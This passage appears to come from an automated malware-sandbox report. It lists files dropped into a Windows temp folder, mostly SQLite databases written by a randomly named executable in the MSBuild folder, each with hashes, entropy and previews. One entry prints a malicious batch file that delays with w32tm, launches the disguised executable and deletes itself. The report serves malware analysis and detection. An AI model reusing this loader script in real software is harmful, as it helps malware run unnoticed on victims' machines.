                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\OjpP01pGCi

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):239
                                                                                      Entropy (8bit):5.375769514154598
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:hCijTg3Nou1SV+DER5IHrQc6zSKOZG1wkn23f1CTn:HTg9uYDEfIrQzIfNg
                                                                                      MD5:887E0E3DF7F29498378BB83B93C28C47
                                                                                      SHA1:5FBFC95FA13EAF004D04C16373228A1B6E276B04
                                                                                      SHA-256:261E32A892736F1E83F8F62A685AFD918E3EA55703ED063B370330C190B47AD9
                                                                                      SHA-512:1495BD1ED65DF5F7FB7FD8C3204EB173B3FFA4CAB8921FF068C45E8509D2502605F24ACAA186DC797F4357734171139A6E2DD340C509975A8CB2F223928D3A89
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\P9ncPmw0Gs.bat"

                                                                                      C:\Users\user\AppData\Local\Temp\PG39mm8x93

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\PSV5MqB4Qe

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\PaQW3YqTzw

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Q907SiRxS1

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.323856189774723
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:MhLCR9Dn:gLaDn
                                                                                      MD5:E5DCD576BFF1A7E02CD51D2FF39018B0
                                                                                      SHA1:9B60BD85429CA6178A014E7CC354367913E4271A
                                                                                      SHA-256:6DCF7FE94A96DDDB493F4DB06941FBC56159B84F750DA8263DD77BC6515172C4
                                                                                      SHA-512:5CEE769189B7C3A640C1B598F233FF4424D12387405329F27FF82C34100329C37B687A33A281695AA401BC11CCC236DC3EE3EEA9C2CC9A7B17B10CC423DADCB9
                                                                                      Malicious:false
                                                                                      Preview:FUJGo0DDigrc0qcblNy49oIVB

                                                                                      C:\Users\user\AppData\Local\Temp\QDJkDFAhRW

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\QWCtqvMXQh

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\QfKiY65Fzi

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\R7kD0xwFaE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\RK2VGdQQGB

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\RM1PmNO2BM

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\RNO0a8Hd7I

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Rcpv6qDZFo

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\SPGOhLgTqZ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\STqBxLrLiP

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\SctbWkreWZ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ShcmIPEYbx

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\SlQQOUQ4YI

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\SnjP54V2Xz

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\SrBS5E5cQc

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\TM9ac77YD1

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\TQQSiHnYXa

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
